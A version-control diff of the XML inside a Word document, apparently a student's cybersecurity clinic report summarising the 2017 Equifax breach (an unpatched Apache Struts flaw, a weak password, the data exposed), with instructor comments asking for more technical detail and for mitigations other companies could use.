+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> turn over</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the said data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> anyone who want</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to know credit </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>of certain</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> individuals.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Originally named Retail Credit Company before its last controversy, Equifax changed its name for a better image and expanded its credit report onto companies in the United States after 1975. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Forward to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>September 7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:vertAlign w:val="superscript"/>
+        </w:rPr>
+        <w:t>th</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, 2017, Equifax announced a cybercrime </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">identity theft event. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Equifax breach had a major failure on the internal control of security system. The underlying causes of this breach</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> involved </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>n “Apache Struts” vulnerability with an</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IT systems administrator using an insecure </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">password. </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The publicized and known specific cause of the Equifax breach was a failure to install a well-publicized security patch to </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>System Affected</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This attack impacted </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>approximately 145.5 million U.S. consumers</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> along with several million Canadian and British residents. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>If you have a credit report, there’s a good chance that you’re one of the 143 million American consumers</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>whose sensitive personal information was exposed in a data breach at Equifax, one of the nation’s three major credit reporting agencies.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>The breach lasted from mid-May through July. The hackers accessed people’s names, Social Security numbers, birth dates, addresses and, in some instances, driver’s license numbers. They also stole credit card numbers for about 209,000 people and dispute documents with personal identifying information for about 182,000 people. And they grabbed personal information of people in the UK and Canada too.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -305,7 +559,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Exploit</w:t>
+        <w:t>Mitigations</w:t>
       </w:r>
       <w:commentRangeEnd w:id="1"/>
       <w:r>
@@ -320,83 +574,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>The publicized and known specific cause of the Equifax breach was a failure to install a well-publicized security patch to an “Apache Struts” vulnerability. An earlier 2017 Equifax breach involved an IT systems administrator using an insecure password that did not comply with best practices, or even Equifax’s own policies.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>System Affected</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:commentRangeStart w:id="2"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Mitigations</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="2"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:commentReference w:id="2"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -414,7 +592,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -435,7 +613,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -456,7 +634,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -477,7 +655,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -498,25 +676,59 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId14" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://www.consumer.ftc.gov/blog/2017/09/equifax-data-breach-what-do</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId15" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:noProof/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://www.cnbc.com/2017/09/07/credit-reporting-firm-equifax-says-cybersecurity-incident-could-potentially-affect-143-million-us-consumers.html</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -525,7 +737,7 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="first" r:id="rId14"/>
+      <w:headerReference w:type="first" r:id="rId16"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -560,37 +772,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>make sure you explain details of how the exploit worked technically. Like specifically: it exploited a buffer overflow vulnerability in the Microsoft XX service that resulted in full administrator access.  Maybe expand upon what a buffer overflow is.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="2" w:author="Josh Gould" w:date="2018-10-22T09:01:00Z" w:initials="JG">
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t>The discussion of what the victims did at the time is good, but make sure your mitigations sections also describe how other companies can mitigate the risk of this happening to them. For example: for ransomware, in addition to saying what the affected company did, how can other companies prevent this from happening to them?  This will help your final projects.</w:t>
       </w:r>
     </w:p>
@@ -615,14 +796,12 @@
 
 <file path=word/commentsExtended.xml><?xml version="1.0" encoding="utf-8"?>
 <w15:commentsEx xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
-  <w15:commentEx w15:paraId="6B299AD7" w15:done="0"/>
   <w15:commentEx w15:paraId="7D33D47A" w15:done="0"/>
 </w15:commentsEx>
 </file>
 
 <file path=word/commentsIds.xml><?xml version="1.0" encoding="utf-8"?>
 <w16cid:commentsIds xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
-  <w16cid:commentId w16cid:paraId="6B299AD7" w16cid:durableId="1F781072"/>
   <w16cid:commentId w16cid:paraId="7D33D47A" w16cid:durableId="1F781065"/>
 </w16cid:commentsIds>
 </file>

--- a/_seniorI/CLINIC/Equifax Data Breach.docx
+++ b/_seniorI/CLINIC/Equifax Data Breach.docx
@@ -4,34 +4,38 @@
   <w:body>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48E3A198" wp14:editId="1020703A">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48E3A198" wp14:editId="4FBBE0E0">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="margin">
-              <wp:align>right</wp:align>
+              <wp:posOffset>4391025</wp:posOffset>
             </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>1123950</wp:posOffset>
+            <wp:positionV relativeFrom="page">
+              <wp:posOffset>2095500</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="1314450" cy="1276350"/>
+            <wp:extent cx="1412240" cy="1371600"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapTight wrapText="bothSides">
               <wp:wrapPolygon edited="0">
                 <wp:start x="0" y="0"/>
-                <wp:lineTo x="0" y="21278"/>
-                <wp:lineTo x="21287" y="21278"/>
-                <wp:lineTo x="21287" y="0"/>
+                <wp:lineTo x="0" y="21300"/>
+                <wp:lineTo x="21270" y="21300"/>
+                <wp:lineTo x="21270" y="0"/>
                 <wp:lineTo x="0" y="0"/>
               </wp:wrapPolygon>
             </wp:wrapTight>
@@ -49,7 +53,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId6">
+                    <a:blip r:embed="rId7">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -62,7 +66,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="1314450" cy="1276350"/>
